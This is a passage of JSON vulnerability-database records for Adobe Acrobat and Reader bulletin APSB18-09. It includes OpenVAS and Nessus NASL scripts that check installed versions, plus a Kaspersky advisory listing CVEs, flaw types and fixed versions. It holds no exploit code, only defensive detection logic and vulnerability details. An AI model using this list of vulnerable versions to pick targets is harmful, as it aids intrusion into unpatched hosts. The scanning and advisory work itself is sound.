"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:17:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "This host is installed with Adobe Acrobat 2017\n and is prone to multiple vulnerabilities.", "modified": "2019-07-16T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813232", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813232", "type": "openvas", "title": "Adobe Acrobat 2017 Security Updates(apsb18-09)-MAC OS X", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Acrobat 2017 Security Updates(apsb18-09)-MAC OS X\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813232\");\n script_version(\"2019-07-16T10:51:36+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4996\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", \"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", \"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-16 10:51:36 +0000 (Tue, 16 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:36 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Acrobat 2017 Security Updates(apsb18-09)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat 2017\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat 2017 before 2017.011.30080 on\n MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat 2017 version\n 2017.011.30080 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Acrobat/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_in_range(version:vers, test_version:\"17.0\", test_version2:\"17.011.30079\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"17.011.30080 (2017.011.30080)\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:18:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "This host is installed with Adobe Reader 2017\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813233", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813233", "type": "openvas", "title": "Adobe Reader 2017 Security Updates(apsb18-09)-MAC OS X", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Reader 2017 Security Updates(apsb18-09)-MAC OS X\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813233\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4996\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", \"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", \"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:36 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Reader 2017 Security Updates(apsb18-09)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader 2017\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat Reader 2017 prior to version\n 2017.011.30080 on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat Reader 2017 version\n 2017.011.30080 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Reader/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_in_range(version:vers, test_version:\"17.0\", test_version2:\"17.011.30079\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2017.011.30080\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:54:57", "bulletinFamily": "info", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "### *Detect date*:\n05/14/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Adobe Acrobat and Acrobat Reader. Malicious users can exploit these vulnerabilities to execute arbitrary code, obtain sensitive information and bypass security restrictions. Below is a complete list of vulnerabilities:\n\n### *Affected products*:\nAdobe Acrobat DC earlier than 2018.011.20040 \nAdobe Acrobat Reader DC earlier than 2018.011.20040 \nAdobe Acrobat 2017 earlier than 2017.011.30080 \nAdobe Acrobat Reader 2017 earlier than 2017.011.30080 \nAdobe Acrobat DC (Classic 2015) earlier than 2015.006.30418 \nAdobe Acrobat Reader DC (Classic 2015) earlier than 2015.006.30418\n\n### *Solution*:\nUpgrade to latest version \n[Download Adobe Acrobat DC](<http://supportdownloads.adobe.com/product.jsp?product=1&platform=Windows>) \n[Download Adobe Acrobat Reader DC](<https://get.adobe.com/ru/reader/>)\n\n### *Original advisories*:\n[APSB18-09](<https://helpx.adobe.com/security/products/acrobat/apsb18-09.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Adobe Acrobat](<https://threats.kaspersky.com/en/product/Adobe-Acrobat/>)\n\n### *CVE-IDS*:\n[CVE-2018-4990](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4990>)0.0Unknown \n[CVE-2018-4947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4947>)0.0Unknown \n[CVE-2018-4948](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4948>)0.0Unknown \n[CVE-2018-4966](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4966>)0.0Unknown \n[CVE-2018-4968](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4968>)0.0Unknown \n[CVE-2018-4978](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4978>)0.0Unknown \n[CVE-2018-4982](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4982>)0.0Unknown \n[CVE-2018-4984](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4984>)0.0Unknown \n[CVE-2018-4996](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4996>)0.0Unknown \n[CVE-2018-4952](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4952>)0.0Unknown \n[CVE-2018-4954](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4954>)0.0Unknown \n[CVE-2018-4958](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4958>)0.0Unknown \n[CVE-2018-4959](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4959>)0.0Unknown \n[CVE-2018-4961](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4961>)0.0Unknown \n[CVE-2018-4971](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4971>)0.0Unknown \n[CVE-2018-4974](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4974>)0.0Unknown \n[CVE-2018-4977](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4977>)0.0Unknown \n[CVE-2018-4980](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4980>)0.0Unknown \n[CVE-2018-4983](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4983>)0.0Unknown \n[CVE-2018-4988](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4988>)0.0Unknown \n[CVE-2018-4989](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4989>)0.0Unknown \n[CVE-2018-4950](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4950>)0.0Unknown \n[CVE-2018-4979](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4979>)0.0Unknown \n[CVE-2018-4949](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4949>)0.0Unknown \n[CVE-2018-4951](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4951>)0.0Unknown \n[CVE-2018-4955](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4955>)0.0Unknown \n[CVE-2018-4956](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4956>)0.0Unknown \n[CVE-2018-4957](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4957>)0.0Unknown \n[CVE-2018-4960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4960>)0.0Unknown \n[CVE-2018-4962](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4962>)0.0Unknown \n[CVE-2018-4963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4963>)0.0Unknown \n[CVE-2018-4964](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4964>)0.0Unknown \n[CVE-2018-4967](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4967>)0.0Unknown \n[CVE-2018-4969](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4969>)0.0Unknown \n[CVE-2018-4970](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4970>)0.0Unknown \n[CVE-2018-4972](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4972>)0.0Unknown \n[CVE-2018-4973](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4973>)0.0Unknown \n[CVE-2018-4975](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4975>)0.0Unknown \n[CVE-2018-4976](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4976>)0.0Unknown \n[CVE-2018-4981](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4981>)0.0Unknown \n[CVE-2018-4986](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4986>)0.0Unknown \n[CVE-2018-4985](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4985>)0.0Unknown \n[CVE-2018-4953](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4953>)0.0Unknown \n[CVE-2018-4987](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4987>)0.0Unknown \n[CVE-2018-4965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4965>)0.0Unknown \n[CVE-2018-4993](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4993>)0.0Unknown \n[CVE-2018-4995](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4995>)0.0Unknown \n[CVE-2018-12812](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12812>)0.0Unknown \n[CVE-2018-12815](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12815>)0.0Unknown\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).", "edition": 40, "modified": "2020-06-18T00:00:00", "published": "2018-05-14T00:00:00", "id": "KLA11252", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11252", "title": "\r KLA11252Multiple vulnerabilities in Adobe Acrobat and Acrobat Reader ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-03-01T01:17:11", "description": "The version of Adobe Reader installed on the remote Windows host is a\nversion prior or equal to 2015.006.30417, 2017.011.30079, or\n2018.011.20038. It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 34, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-17T00:00:00", "title": "Adobe Reader <= 2015.006.30417 / 2017.011.30079 / 2018.011.20038 Multiple Vulnerabilities (APSB18-09)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:adobe:acrobat_reader"], "id": "ADOBE_READER_APSB18-09.NASL", "href": "https://www.tenable.com/plugins/nessus/109896", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109896);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/04/08 10:48:58\");\n\n script_cve_id(\n \"CVE-2018-4947\",\n \"CVE-2018-4948\",\n \"CVE-2018-4949\",\n \"CVE-2018-4950\",\n \"CVE-2018-4951\",\n \"CVE-2018-4952\",\n \"CVE-2018-4953\",\n \"CVE-2018-4954\",\n \"CVE-2018-4955\",\n \"CVE-2018-4956\",\n \"CVE-2018-4957\",\n \"CVE-2018-4958\",\n \"CVE-2018-4959\",\n \"CVE-2018-4960\",\n \"CVE-2018-4961\",\n \"CVE-2018-4962\",\n \"CVE-2018-4963\",\n \"CVE-2018-4964\",\n \"CVE-2018-4965\",\n \"CVE-2018-4966\",\n \"CVE-2018-4967\",\n \"CVE-2018-4968\",\n \"CVE-2018-4969\",\n \"CVE-2018-4970\",\n \"CVE-2018-4971\",\n \"CVE-2018-4972\",\n \"CVE-2018-4973\",\n \"CVE-2018-4974\",\n \"CVE-2018-4975\",\n \"CVE-2018-4976\",\n \"CVE-2018-4977\",\n \"CVE-2018-4978\",\n \"CVE-2018-4979\",\n \"CVE-2018-4980\",\n \"CVE-2018-4981\",\n \"CVE-2018-4982\",\n \"CVE-2018-4983\",\n \"CVE-2018-4984\",\n \"CVE-2018-4985\",\n \"CVE-2018-4986\",\n \"CVE-2018-4987\",\n \"CVE-2018-4988\",\n \"CVE-2018-4989\",\n \"CVE-2018-4990\",\n \"CVE-2018-4993\",\n \"CVE-2018-4995\",\n \"CVE-2018-4996\",\n \"CVE-2018-12812\",\n \"CVE-2018-12815\"\n );\n script_bugtraq_id(\n 104102,\n 104167,\n 104168,\n 104169,\n 104171,\n 104172,\n 104173,\n 104174,\n 104175,\n 104176,\n 104177\n );\n\n script_name(english:\"Adobe Reader <= 2015.006.30417 / 2017.011.30079 / 2018.011.20038 Multiple Vulnerabilities (APSB18-09)\");\n script_summary(english:\"Checks the version of Adobe Reader.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader installed on the remote Windows host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the remote Windows host is a\nversion prior or equal to 2015.006.30417, 2017.011.30079, or\n2018.011.20038. It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Reader 2015.006.30418 / 2017.011.30080\n/ 2018.011.20040 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4947\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_reader_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/Adobe Reader\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::adobe_reader::get_app_info();\nconstraints = [\n { \"min_version\" : \"15.6\", \"max_version\" : \"15.6.30417\", \"fixed_version\" : \"15.6.30418\" },\n { \"min_version\" : \"17.8\", \"max_version\" : \"17.11.30079\", \"fixed_version\" : \"17.11.30080\" },\n { \"min_version\" : \"15.7\", \"max_version\" : \"18.11.20038\", \"fixed_version\" : \"18.11.20040\" }\n];\n# using adobe_reader namespace check_version_and_report to properly detect Continuous vs Classic, \n# and limit ver segments to 3 (18.x.y vs 18.x.y.12345) with max_segs:3\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T01:15:43", "description": "The version of Adobe Acrobat installed on the remote Windows host is a\nversion prior to 2015.006.30418, 2017.011.30080,\nor 2018.011.20040. It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 32, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-17T00:00:00", "title": "Adobe Acrobat < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", 